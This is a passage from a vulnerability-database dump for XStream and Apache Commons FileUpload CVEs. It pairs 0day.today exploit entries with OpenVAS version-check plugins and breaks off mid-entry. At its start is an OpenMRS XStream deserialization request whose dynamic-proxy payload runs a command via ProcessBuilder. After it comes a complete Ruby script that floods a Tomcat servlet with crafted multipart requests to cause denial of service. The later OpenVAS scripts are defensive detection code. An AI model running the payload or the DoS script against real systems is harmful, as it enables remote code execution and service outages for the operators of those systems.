/openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d\"java.beans.EventHandler\"><target%20class%3d\"java.lang.ProcessBuilder\"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject\r\n \r\nRemediation:\r\n \r\nThe vendor has addressed this issue in OpenMRS Standalone 2.3.1,\r\nOpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,\r\n1.10.3, and 1.9.10.\r\n \r\nTimeline:\r\n \r\nVendor contacted: November 2, 2015\r\nVendor replied: November 3\r\nCVE requested: November 14 (no response)\r\nPatch released: December 2\r\nAnnounced: January 6, 2016\n\n# 0day.today [2018-04-06] #", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24847"}, {"lastseen": "2018-01-04T07:03:17", "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "published": "2014-02-12T00:00:00", "type": "zdt", "title": "Apache Commons FileUpload and Apache Tomcat Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "1337DAY-ID-21887", "href": "https://0day.today/exploit/description/21887", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. #\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n puts \"\"\r\n puts \"#################################################################################\"\r\n puts \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n puts \"# #\"\r\n puts \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n puts \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n puts \"# of assisting system administrators in evaluating whether or not #\"\r\n puts \"# their applications are vulnerable to this issue. #\"\r\n puts \"# #\"\r\n puts \"# Please use responsibly. #\"\r\n puts \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = \"\"\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts \"\"\r\n puts \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts \"\"\r\n puts \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts \"Request Launched\"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme==\"https\"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n req.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n req.body = \"b\"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts \"Timeout - continuing DoS...\"\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21887"}], "openvas": [{"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:1361412562310867530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867530", "type": "openvas", "title": "Fedora Update for xstream FEDORA-2014-2340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xstream FEDORA-2014-2340\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867530\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:08:23 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for xstream FEDORA-2014-2340\");\n script_tag(name:\"affected\", value:\"xstream on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2340\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128864.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xstream'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"xstream\", rpm:\"xstream~1.3.1~5.1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:1361412562310867544", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867544", "type": "openvas", "title": "Fedora Update for xstream FEDORA-2014-2372", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xstream FEDORA-2014-2372\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867544\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:33:30 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for xstream FEDORA-2014-2372\");\n script_tag(name:\"affected\", value:\"xstream on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2372\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128807.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xstream'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"xstream\", rpm:\"xstream~1.3.1~9.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "Check for the Version of xstream", "modified": "2017-07-10T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:867530", "href": "http://plugins.openvas.org/nasl.php?oid=867530", "type": "openvas", "title": "Fedora Update for xstream FEDORA-2014-2340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xstream FEDORA-2014-2340\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867530);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:08:23 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for xstream FEDORA-2014-2340\");\n\n tag_insight = \"XStream is a simple library to serialize objects to XML\nand back again. A high level facade is supplied that\nsimplifies common use cases. Custom objects can be serialized\nwithout need for specifying mappings. Speed and low memory\nfootprint are a crucial part of the design, making it suitable\nfor large object graphs or systems with high message throughput.\nNo information is duplicated that can be obtained via reflection.\nThis results in XML that is easier to read for humans and more\ncompact than native Java serialization. XStream serializes internal\nfields, including private and final. Supports non-public and inner\nclasses. Classes are not required to have default constructor.\nDuplicate references encountered in the object-model will be\nmaintained. Supports circular references. By implementing an\ninterface, XStream can serialize directly to/from any tree\nstructure (not just XML). Strategies can be registered allowing\ncustomization of how particular types are represented as XML.\nWhen an exception occurs due to malformed XML, detailed diagnostics\nare provided to help isolate and fix the problem.\n\";\n\n tag_affected = \"xstream on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2340\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128864.html\");\n script_summary(\"Check for the Version of xstream\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"xstream\", rpm:\"xstream~1.3.1~5.1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "Check for the Version of xstream", "modified": "2017-07-10T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:867544", "href": "http://plugins.openvas.org/nasl.php?oid=867544", "type": "openvas", "title": "Fedora Update for xstream FEDORA-2014-2372", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xstream FEDORA-2014-2372\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867544);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:33:30 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for xstream FEDORA-2014-2372\");\n\n tag_insight = \"XStream is a simple library to serialize objects to XML\nand back again. A high level facade is supplied that\nsimplifies common use cases. Custom objects can be serialized\nwithout need for specifying mappings. Speed and low memory\nfootprint are a crucial part of the design, making it suitable\nfor large object graphs or systems with high message throughput.\nNo information is duplicated that can be obtained via reflection.\nThis results in XML that is easier to read for humans and more\ncompact than native Java serialization. XStream serializes internal\nfields, including private and final. Supports non-public and inner\nclasses. Classes are not required to have default constructor.\nDuplicate references encountered in the object-model will be\nmaintained. Supports circular references. By implementing an\ninterface, XStream can serialize directly to/from any tree\nstructure (not just XML). Strategies can be registered allowing\ncustomization of how particular types are represented as XML.\nWhen an exception occurs due to malformed XML, detailed diagnostics\nare provided to help isolate and fix the problem.\n\";\n\n tag_affected = \"xstream on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2372\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128807.html\");\n script_summary(\"Check for the Version of xstream\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"xstream\", rpm:\"xstream~1.3.1~9.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-7285"], "description": "Artifactory is prone to a remote code-execution vulnerability.", "modified": "2019-05-21T00:00:00", "published": "2014-03-13T00:00:00", "id": "OPENVAS:1361412562310103919", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103919", "type": "openvas", "title": "Artifactory XStream Remote Code Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Artifactory XStream Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:jfrog:artifactory\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103919\");\n script_bugtraq_id(64760);\n script_cve_id(\"CVE-2013-7285\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-05-21T14:04:10+0000\");\n\n script_name(\"Artifactory XStream Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/64760\");\n script_xref(name:\"URL\", value:\"http://www.jfrog.com/confluence/display/RTF/Artifactory+3.1.1\");\n\n script_tag(name:\"last_modification\", value:\"2019-05-21 14:04:10 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-13 10:30:44 +0100 (Thu, 13 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_artifactory_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"artifactory/installed\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute\narbitrary code in the context of the user running the affected\napplication.\");\n script_tag(name:\"vuldetect\", value:\"Check the installed version.\");\n script_tag(name:\"insight\", value:\"Artifactory prior to version 3.1.1.1 using a XStream library\nwhich is prone to a remote code execution vulnerability.\");\n script_tag(name:\"solution\", value:\"Update to Artifactory 3.1.1.1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Artifactory is prone to a remote code-execution vulnerability.\");\n script_tag(name:\"affected\", value:\"Artifactory < 3.1.1.1\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE) ) exit( 0 );\nif( vers = get_app_version( cpe:CPE, port:port ) )\n{\n if( version_is_less( version: vers, test_version: \"3.1.1.1\" ) )\n {\n report = 'Installed version: ' + vers + '\\nFixed version: 3.1.1.1';\n\n security_message( port:port, data:report );\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "Check for the Version of apache-commons-fileupload", "modified": "2017-07-10T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:867523", "href": "http://plugins.openvas.org/nasl.php?oid=867523", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2175\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867523);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:08:39 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2175\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2175\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\");\n script_summary(\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.", "modified": "2017-07-11T00:00:00", "published": "2014-02-07T00:00:00", "id": "OPENVAS:702856", "href": "http://plugins.openvas.org/nasl.php?oid=702856", "type": "openvas", "title": "Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2856.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 2856-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libcommons-fileupload-java on Debian Linux\";\ntag_insight = \"The Commons FileUpload package makes it easy to add robust, high-performance,\nfile upload capability to your servlets and web applications.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\";\ntag_summary = \"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702856);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_name(\"Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-02-07 00:00:00 +0100 (Fri, 07 Feb 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2856.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: 